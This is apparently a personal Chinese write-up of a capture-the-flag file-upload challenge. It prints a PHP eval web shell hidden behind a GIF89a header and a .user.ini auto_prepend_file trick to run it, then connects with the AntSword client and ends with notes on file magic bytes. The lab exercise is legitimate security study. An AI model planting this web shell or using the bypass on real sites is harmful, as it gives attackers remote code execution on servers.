可恶啊 今天差点没做题
先随便上传一个 提示文件要图片
改一下后缀名
文件内容为:
GIF89a
<script language="php">eval($_POST['shell']);</script>
然后我们构造一个.user.ini文件
GIF89a
auto_prepend_file=test.jpg
把这个也上传
连接蚁剑
连接的url要加上dir这段
http://4e81767b-49fa-4900-ae74-e1d5e68039ab.node4.buuoj.cn/uploads/02d89d4f45a50f9d380b76307d658cc3/index.php
差点给爷整不会了
.user.ini 文件名拼错了
我也是服了
进入/flag目录下是空的? 重进一下又好了?
非常波折啊 白白浪费了我半个多小时
记录一下知识点
1.幻术头字节
JPG :FF D8 FF E0 00 10 4A 46 49 46
GIF(相当于文本的GIF89a):47 49 46 38 39 61
PNG: 89 50 4E 47
因为上传要求呢 我的两个文件都写了GIF89a
2…user.ini文件
auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件
auto_append_file 表示在php代码执行完毕后加载指定的php文件
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
